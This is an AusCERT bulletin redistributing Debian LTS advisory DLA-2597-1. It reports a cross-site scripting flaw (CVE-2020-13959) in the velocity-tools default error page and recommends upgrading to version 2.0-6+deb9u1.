Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0944
velocity-tools security update
18 March 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: velocity-tools
Publisher: Debian
Operating System: Debian GNU/Linux
UNIX variants (UNIX, Linux, OSX)
Windows
Impact/Access: Cross-site Scripting -- Remote with User Interaction
Resolution: Patch/Upgrade
CVE Names: CVE-2020-13959
Original Bulletin:
https://www.debian.org/lts/security/2021/dla-2597
Comment: This advisory references vulnerabilities in products which run on
platforms other than Debian. It is recommended that administrators
running velocity-tools check for an updated version of the software
for their operating system.
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-2597-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Chris Lamb
March 17, 2021 https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------
Package : velocity-tools
Version : 2.0-6+deb9u1
CVE ID : CVE-2020-13959
Debian Bug : #985221
It was discovered that there was a cross-site scripting (XSS)
vulnerability in velocity-tools, a collection of useful tools for the
"Velocity" template engine.
The default error page could be exploited to steal session cookies,
perform requests in the name of the victim, used for phishing attacks
and many other similar attacks.
For Debian 9 "Stretch", this problem has been fixed in version
2.0-6+deb9u1.
We recommend that you upgrade your velocity-tools packages.
For the detailed security status of velocity-tools please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/velocity-tools
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
- -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEwv5L0nHBObhsUz5GHpU+J9QxHlgFAmBSLmcACgkQHpU+J9Qx
Hlh5Jg//dgNUCvH3xd8rRp+WRO6wbydKLSwi59x01l3jgS5mOnypXi/urXUBYYSn
WM1saZt4dkG8yXAMcRa5WHKbWZ2A8Xg1fHrqAHoF+dU8WsJkaNAkWjpNEmEjhzjc
R1rrdN3UkUjK4A8FspTWKBdC/YeQLmVapBALxAZGKCyxmruzXhoYsyi8vk0ZJWRY
5xu2A+UjpcfMkWj1lDNGY37azFBv5r2wxSsIhPScKvYUCVN55sb4jvZ/SBYaKin5
kCOVGjV2wloqi0gOr+Eq/qfj6QW1d/v8nPa+RGPacmwj/RbuzMl2VSNkmYweAxob
qK4+OMMipFa3/OGBpe270SytY1FadiNiJEPgEXe76m7L2ufJLvsactSNX1Fqn/7Z
E0kpwhIk4gpexYhQQ2x9EEiTF4VpIzDOb8Osztfrbqoq7DjCQAiDfG9PrqcGpQQP
1In2YfGVkSvoYoNqqirPpOnX3DLd2Er5aBjyVDG1Q0RdfDkCwM9TnbxqUSMmw3lA
FyFW/MyHVQKrFq+FM+tnYTjRLqDgyyniyhXEIC69XVRPK8qGuvny4uh9ARe/NW3P
BoR3DwyB75VN13W3n2au+MMBvV87N8hkHfjPcRYS7m1xlRzS+KTW0Hzs48t+Y4Uc
J4Zd5kZUUAntM1+19NmqBa0CbhlyBRHhDqdrTjjJwYwpR9m0y08=
=KVwn
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYFKVMuNLKJtyKPYoAQjU+BAAl0LnJ9Jq/j02mPjdQBMaVFsS61A3PGf9
uLQ7qQ9fXAY743vO3w4ruGQlrJr+0KNTF45Kw35NC5hwG12Su7ztyP9U4iw4caKQ
eW5tvop0Y1N1v7Mlu02+IfWNyRdOd8AcwTEE1pq5760WOl6MJUSsvGhQMJxNKw53
6jTkAcrU1rT7+QV3vzauLkE1hrwW1bcg3K3LioPKppF9b8RLpuL3fP/OVEfYW8Tu
OJNL4dLnM/x/pt0N9FN6i3buwszzVQ9eHl22UnMw2H4TIf5QiiSWHGCtXHY5wehr
NtmLM5h5kXNxstkAYfnoq9IjJFW6SdjFLf6lpyFR4WznuicpKjLlShWtLFwSshHH
Z2aDDN24kKgpc6TQmBqE2hx0k+LOplLf3tWAYzOcOrvN6IClPHK5Q5iiKBVD0Nqq
WSnc+s3Ctk8AtqqmbkHzOEtkPXO71D/fMEgSKKMXuTtC52nqNlfvYX0tpki69ZTr
fqS5AiRR8iOZiIXirP58+Q+fkYGOK1+vIie8o111FjQqCm/rXZtu9IKLsEYXc6S1
JUK+485PeGV0MT5eN+x2peVu2dlOXvmKGHg/vABJNrnXnJ4YGX8dxfWJ1tC9vgoJ
u2NrP/TFlSvbSzqYn8cNjIwQ5eeYHMDFQxDc+xVwLY9uq2zp9/OEo+x7SY7e/bnE
kvPWGUDc3Zs=
=ghvE
-----END PGP SIGNATURE-----